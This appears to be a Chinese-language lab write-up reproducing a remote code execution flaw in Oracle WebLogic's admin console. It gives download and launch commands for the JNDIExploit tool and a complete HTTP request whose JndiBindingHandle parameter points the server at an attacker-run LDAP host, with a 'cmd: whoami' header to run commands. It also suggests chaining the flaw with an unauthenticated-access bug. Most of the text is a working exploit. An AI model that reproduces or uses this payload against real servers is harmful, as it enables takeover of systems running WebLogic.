Oracle WebLogic:一款流行的JAVA应用服务器
复现环境:本地搭建的环境(win10 1909)
复现版本:WebLogic v12.2.1.4.0
环境搭建:
参考https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA中的环境搭建部分
需要登陆WebLogic控制台
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
攻击环境:kali x64
下载JNDIExploit:https://github.com/feihong-cs/JNDIExploit/releases/download/v.1.11/JNDIExploit.v1.11.zip
启动JNDIExploit:
java -jar ./JNDIExploit-v1.11.jar -i 192.168.1.5#其中192.168.1.5为本机IP
登录WebLogic控制台
刷新WebLogic控制台,burp抓包,替换为如下payload
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;5:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.1.7:7001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
cmd:whoami
Referer: http://192.168.1.7:7001/console/login/LoginForm.jsp
Connection: close
Cookie: ADMINCONSOLESESSION=-XjUGJChfEBvqXqZBo748vnBGr895IIDGF5cmnoR9HkR_uY8Hrfd!-1181708775
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
如下图,可以看到成功执行命令whoami
此漏洞可配合Weblogic未授权访问漏洞(CVE-2020-14882)使用
无